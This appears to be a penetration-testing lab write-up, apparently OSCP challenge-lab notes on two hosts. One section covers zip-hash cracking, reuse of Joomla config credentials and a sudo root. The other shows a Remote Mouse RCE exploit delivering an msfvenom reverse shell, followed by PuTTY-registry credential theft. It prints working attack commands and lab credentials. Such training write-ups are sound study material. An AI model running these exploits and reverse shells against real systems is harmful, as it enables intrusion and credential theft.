stuart@oscp:/opt/backup$ scp sitebackup3.zip kali@192.168.45.199:~/oscp_a/144/
kali@192.168.45.199's password:
sitebackup3.zip

Attempted to extract sitebackup3.zip with 7z, but a password is required
┌──(kali🎃kali)-[~/oscp_a/144]
└─$ 7z x sitebackup3.zip
7-Zip 25.01 (x64) : Copyright (c) 1999-2025 Igor Pavlov : 2025-08-03
64-bit locale=en_US.UTF-8 Threads:32 OPEN_MAX:1024, ASM
Scanning the drive for archives:
1 file, 25312 bytes (25 KiB)
Extracting archive: sitebackup3.zip
--
Path = sitebackup3.zip
Type = zip
Physical Size = 25312
Enter password (will not be echoed):

Extracted a crackable hash from the zip file with zip2john (the warnings below are for directory entries, which are stored unencrypted; the 19 file entries are encrypted)
┌──(kali🎃kali)-[~/oscp_a/144]
└─$ zip2john sitebackup3.zip > sitebackup3_hashes.hash
ver 2.0 sitebackup3.zip/joomla/ is not encrypted, or stored with non-handled compression type
ver 2.0 sitebackup3.zip/joomla/administrator/ is not encrypted, or stored with non-handled compression type
ver 2.0 sitebackup3.zip/joomla/api/ is not encrypted, or stored with non-handled compression type
ver 2.0 sitebackup3.zip/joomla/cache/ is not encrypted, or stored with non-handled compression type
ver 2.0 sitebackup3.zip/joomla/cli/ is not encrypted, or stored with non-handled compression type
ver 2.0 sitebackup3.zip/joomla/components/ is not encrypted, or stored with non-handled compression type
ver 2.0 sitebackup3.zip/joomla/images/ is not encrypted, or stored with non-handled compression type
ver 2.0 sitebackup3.zip/joomla/includes/ is not encrypted, or stored with non-handled compression type
ver 2.0 sitebackup3.zip/joomla/language/ is not encrypted, or stored with non-handled compression type
ver 2.0 sitebackup3.zip/joomla/language/overrides/ is not encrypted, or stored with non-handled compression type
ver 2.0 sitebackup3.zip/joomla/layouts/ is not encrypted, or stored with non-handled compression type
ver 2.0 sitebackup3.zip/joomla/libs/ is not encrypted, or stored with non-handled compression type
ver 2.0 sitebackup3.zip/joomla/media/ is not encrypted, or stored with non-handled compression type
ver 2.0 sitebackup3.zip/joomla/modules/ is not encrypted, or stored with non-handled compression type
ver 2.0 sitebackup3.zip/joomla/plugins/ is not encrypted, or stored with non-handled compression type
ver 2.0 sitebackup3.zip/joomla/templates/ is not encrypted, or stored with non-handled compression type
ver 2.0 sitebackup3.zip/joomla/tmp/ is not encrypted, or stored with non-handled compression type

Cracked the zip password with John the Ripper and rockyou.txt, obtaining the plaintext password codeblue
┌──(kali🎃kali)-[~/oscp_a/144]
└─$ john --wordlist=/usr/share/wordlists/rockyou.txt sitebackup3_hashes.hash
Using default input encoding: UTF-8
Loaded 19 password hashes with 19 different salts (ZIP, WinZip [PBKDF2-SHA1 128/128 AVX 4x])
Loaded hashes with cost 1 (HMAC size) varying from 28 to 6535
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
codeblue (sitebackup3.zip/joomla/language/.DS_Store)
codeblue (sitebackup3.zip/joomla/includes/app.php)
codeblue (sitebackup3.zip/joomla/web.config.txt)
codeblue (sitebackup3.zip/joomla/cli/joomla.php)
codeblue (sitebackup3.zip/joomla/cli/index.html)
codeblue (sitebackup3.zip/joomla/htaccess.txt)
codeblue (sitebackup3.zip/joomla/LICENSE.txt)
codeblue (sitebackup3.zip/joomla/includes/index.html)
codeblue (sitebackup3.zip/joomla/language/overrides/index.html)
codeblue (sitebackup3.zip/joomla/cache/index.html)
codeblue (sitebackup3.zip/joomla/includes/defines.php)
codeblue (sitebackup3.zip/joomla/README.txt)
codeblue (sitebackup3.zip/joomla/language/index.html)
codeblue (sitebackup3.zip/joomla/.DS_Store)
codeblue (sitebackup3.zip/joomla/includes/framework.php)
codeblue (sitebackup3.zip/joomla/index.php)
codeblue (sitebackup3.zip/joomla/configuration.php)
codeblue (sitebackup3.zip/joomla/robots.txt)
codeblue (sitebackup3.zip/joomla/tmp/index.html)
19g 0:00:00:23 DONE (2025-12-14 10:48) 0.8109g/s 1748p/s 33215c/s 33215C/s holabebe..loserface1
Use the "--show" option to display all of the cracked passwords reliably
Session completed.

Extracted the zip archive with 7z using the cracked password
┌──(kali🎃kali)-[~/oscp_a/144]
└─$ 7z x sitebackup3.zip
7-Zip 25.01 (x64) : Copyright (c) 1999-2025 Igor Pavlov : 2025-08-03
64-bit locale=en_US.UTF-8 Threads:32 OPEN_MAX:1024, ASM
Scanning the drive for archives:
1 file, 25312 bytes (25 KiB)
Extracting archive: sitebackup3.zip
--
Path = sitebackup3.zip
Type = zip
Physical Size = 25312
Enter password (will not be echoed):
Everything is Ok
Folders: 17
Files: 19
Size: 67063
Compressed: 25312

Searched the extracted files for passwords and found the Joomla configuration.php
┌──(kali🎃kali)-[~/oscp_a/144/joomla]
└─$ grep -r -i 'passw' *
configuration.php: public $password = 'Password@1';

configuration.php holds the database credentials joomla / Password@1 and the Joomla $secret value Ee24zIK4cDhJHL4H; the latter turned out to be the password of the local user chloe (the username is not in the file, so both values are worth trying against every local account)
┌──(kali🎃kali)-[~/oscp_a/144/joomla]
└─$ cat configuration.php
<?php
class JConfig {
public $offline = false;
public $offline_message = 'This site is down for maintenance.<br>Please check back again soon.';
public $display_offline_message = 1;
public $offline_image = '';
public $sitename = 'Challenge Lab';
public $editor = 'tinymce';
public $captcha = '0';
public $list_limit = 20;
public $access = 1;
public $debug = false;
public $debug_lang = false;
public $debug_lang_const = true;
public $dbtype = 'mysql';
public $host = 'localhost';
public $user = 'joomla';
public $password = 'Password@1';
public $db = 'jooml';
public $dbprefix = 'o83rl_';
public $dbencryption = 0;
public $dbsslverifyservercert = false;
public $dbsslkey = '';
public $dbsslcert = '';
public $dbsslca = '';
public $dbsslcipher = '';
public $force_ssl = 0;
public $live_site = '';
public $secret = 'Ee24zIK4cDhJHL4H';

Switched to the chloe user with su, using the $secret value as the password
stuart@oscp:~$ su chloe
Password:
To run a command as administrator (user "root"), use "sudo <command>".
See "man sudo_root" for details.
chloe@oscp:/home/stuart$

Confirmed chloe has unrestricted sudo ((ALL : ALL) ALL) and escalated to root
chloe@oscp:/home/stuart$ sudo -l
[sudo] password for chloe:
Matching Defaults entries for chloe on oscp:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty
User chloe may run the following commands on oscp:
(ALL : ALL) ALL
chloe@oscp:/home/stuart$
chloe@oscp:/home/stuart$ sudo su -
root@oscp:~#

Read proof.txt file
root@oscp:~# cat /root/proof.txt
7ca5ec703d5a4a2074b6fe1153db351a

192.168.202.145 - Hermes
Nmap
PORT STATE SERVICE
21/tcp open ftp
80/tcp open http
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
1978/tcp open unisql
3389/tcp open ms-wbt-server
7680/tcp open pando-pub
161/udp open snmp

Initial Access
Searched for “1978/tcp open unisql” and found a matching exploit on Exploit-DB (EDB-ID 49601, Remote Mouse 3.008 arbitrary remote command execution; unisql is only nmap's port-table name, 1978/tcp being the Remote Mouse server's default port). The PoC types a download-and-execute command into the target through the unauthenticated mouse/keyboard service, so a reverse-shell executable was built with msfvenom and served from a Python HTTP server
┌──(kali🎃kali)-[~/oscp_a/145]
└─$ msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.45.204 LPORT=4444 -f exe -o payload.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 460 bytes
Final size of exe file: 7680 bytes
Saved as: payload.exe
┌──(kali🎃kali)-[~/oscp_a/145]
└─$ l
49601 payload.exe scan whatweb
┌──(kali🎃kali)-[~/oscp_a/145]
└─$ python -m http.server
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...

Executed the PoC exploit
┌──(kali🎃kali)-[~/oscp_a/145]
└─$ python2 49601 192.168.202.145 192.168.45.204:8000 payload.exe
[+] 3..2..1..
[+] *Super fast hacker typing*
[+] Retrieving payload
[+] Done! Check Your Listener?

Successfully established reverse shell connection
┌──(kali🎃kali)-[~/oscp_a/145]
└─$ rlwrap nc -nlvp 4444
listening on [any] 4444 ...
connect to [192.168.45.204] from (UNKNOWN) [192.168.202.145] 50609
Microsoft Windows [Version 10.0.19041.1]
(c) 2019 Microsoft Corporation. All rights reserved.
C:\WINDOWS\system32>

Read local.txt file
PS C:\Users\offsec\Desktop> dir
dir
Directory: C:\Users\offsec\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 12/15/2025 5:07 AM 34 local.txt
PS C:\Users\offsec\Desktop> type local.txt
type local.txt
6a68dc6059ee54a8bee83a5ba5652452

Privilege Escalation
Found plaintext credentials with winPEAS in the PuTTY sessions stored in the registry: a saved plink command line passes the password on the command line with -pw (zachary / Th3R@tC@tch3r)
Putty Sessions
RegKey Name: zachary
RegKey Value: "&('C:\Program Files\PuTTY\plink.exe') -pw 'Th3R@tC@tch3r' zachary@10.51.21.12 'df -h'"
=================================================================================================

Connected to the target via RDP using the previously discovered credentials
┌──(kali🎃kali)-[~/oscp_a/145]
└─$ xfreerdp3 /u:'zachary' /p:'Th3R@tC@tch3r' /v:192.168.202.145

Read proof.txt file (zachary's session can read the Administrator desktop)
C:\Users\Administrator\Desktop>dir
Volume in drive C has no label.
Volume Serial Number is 2879-D413
Directory of C:\Users\Administrator\Desktop
01/05/2023 11:53 PM <DIR> .
01/05/2023 11:53 PM <DIR> ..
12/15/2025 05:07 AM 34 proof.txt
1 File(s) 34 bytes
2 Dir(s) 9,171,681,280 bytes free
C:\Users\Administrator\Desktop>type proof.txt
4c19b5972793ab554db418a0f6639c4a